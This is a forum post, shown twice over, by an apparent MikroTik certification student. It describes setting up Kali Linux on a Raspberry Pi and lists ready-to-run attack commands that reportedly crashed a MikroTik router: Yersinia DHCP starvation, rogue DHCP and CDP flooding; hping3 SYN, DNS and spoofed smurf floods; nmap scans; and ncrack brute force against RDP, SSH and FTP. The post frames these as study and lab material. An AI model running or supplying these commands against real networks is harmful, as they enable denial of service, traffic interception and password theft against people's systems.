OP 17 November, 2019 - 12:11 PM
Hey guys,
While studying for MikroTik MTCSE cert, I ran into several useful tools and attacks that we successfully performed against a MikroTik hAP Lite using a raspberry pi 2b+. The routerboard completely crashes requiring a manual reboot. Against a RB3011 the raspberry pi was too weak to successfully pull off the attack however given stronger hardware these attacks will be successful.
Note: These attacks can be performed on other networking hardware as well, not only MikroTik. There are mitigation methods to prevent these kind of attacks that should be implemented in production.
The Raspberry pi was installed as follows:
1) Install Kali Linux on Raspberry Pi
2) Run Kali Linux then update
sudo apt update -y && sudo apt upgrade -y
3) Optional: Install RDP and enable AutoStart (Easier access to Raspberry via RDP)
sudo apt-get install xrdp
systemctl enable xrdp
service xrdp start
4) Install Attack Tools
sudo apt-get install nmap yersinia hping3
5) Perform attacks
# Yersinia (OSI Layer 2 Attacks - CDP, DHCP, STP...) | https://github.com/tomac/yersinia
> DHCP Starvation: Yersinia -G > Launch Attack > DHCP > sending DISCOVER packet
> DHCP Rogue MITM: Yersinia -G > Launch Attack > DHCP > creating DHCP rogue server
> MNDP/CDP/LLDP attack: Yersinia -G > Launch Attack > CDP > flooding CDP table
# nmap (OSI Layer 4 - Port Scanner) | https://nmap.org
> Simple Port Scan: nmap 10.0.0.1
> Port Scan with Version Detection: nmap -A -T4 -F 10.0.0.1
> Determine Uptime: nmap -v -O 10.0.0.1
> Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet
# hping3 (OSI Layer 3/4 Attacks - Flood SYN, UDP…) | https://tools.kali.org/information-gathering/hping3
> DNS Flood: hping3 --udp -p 53 --flood --rand-source 10.0.0.1
> TCP SYN Attack: hping3 -p 80 --flood -d 120 -S -w 64 --rand-source -c 20000 10.0.0.1
> ICMP Smurf Attack: hping3 --icmp --spoof --flood --rand-source -c 20000 10.0.0.1 10.0.0.255
# ncrack (OSI Layer 4 - Brute Force Attacks) | https://nmap.org/ncrack/
> RDP - ncrack -vv -U username.txt -P password.txt 192.168.1.208:3389
> SSH - ncrack -vv -U username.txt -P password.txt 192.168.1.208:22
> FTP - ncrack -vv -U username.txt -P password.txt 192.168.1.208:21
Feel free to like, share & comment =).
While studying for MikroTik MTCSE cert, I ran into several useful tools and attacks that we successfully performed against a MikroTik hAP Lite using a raspberry pi 2b+. The routerboard completely crashes requiring a manual reboot. Against a RB3011 the raspberry pi was too weak to successfully pull off the attack however given stronger hardware these attacks will be successful.
Note: These attacks can be performed on other networking hardware as well, not only MikroTik. There are mitigation methods to prevent these kind of attacks that should be implemented in production.
The Raspberry pi was installed as follows:
1) Install Kali Linux on Raspberry Pi
2) Run Kali Linux then update
sudo apt update -y && sudo apt upgrade -y
3) Optional: Install RDP and enable AutoStart (Easier access to Raspberry via RDP)
sudo apt-get install xrdp
systemctl enable xrdp
service xrdp start
4) Install Attack Tools
sudo apt-get install nmap yersinia hping3
5) Perform attacks
# Yersinia (OSI Layer 2 Attacks - CDP, DHCP, STP...) | https://github.com/tomac/yersinia
> DHCP Starvation: Yersinia -G > Launch Attack > DHCP > sending DISCOVER packet
> DHCP Rogue MITM: Yersinia -G > Launch Attack > DHCP > creating DHCP rogue server
> MNDP/CDP/LLDP attack: Yersinia -G > Launch Attack > CDP > flooding CDP table
# nmap (OSI Layer 4 - Port Scanner) | https://nmap.org
> Simple Port Scan: nmap 10.0.0.1
> Port Scan with Version Detection: nmap -A -T4 -F 10.0.0.1
> Determine Uptime: nmap -v -O 10.0.0.1
> Cheat Sheet: https://highon.coffee/blog/nmap-cheat-sheet
# hping3 (OSI Layer 3/4 Attacks - Flood SYN, UDP…) | https://tools.kali.org/information-gathering/hping3
> DNS Flood: hping3 --udp -p 53 --flood --rand-source 10.0.0.1
> TCP SYN Attack: hping3 -p 80 --flood -d 120 -S -w 64 --rand-source -c 20000 10.0.0.1
> ICMP Smurf Attack: hping3 --icmp --spoof --flood --rand-source -c 20000 10.0.0.1 10.0.0.255
# ncrack (OSI Layer 4 - Brute Force Attacks) | https://nmap.org/ncrack/
> RDP - ncrack -vv -U username.txt -P password.txt 192.168.1.208:3389
> SSH - ncrack -vv -U username.txt -P password.txt 192.168.1.208:22
> FTP - ncrack -vv -U username.txt -P password.txt 192.168.1.208:21
Feel free to like, share & comment =).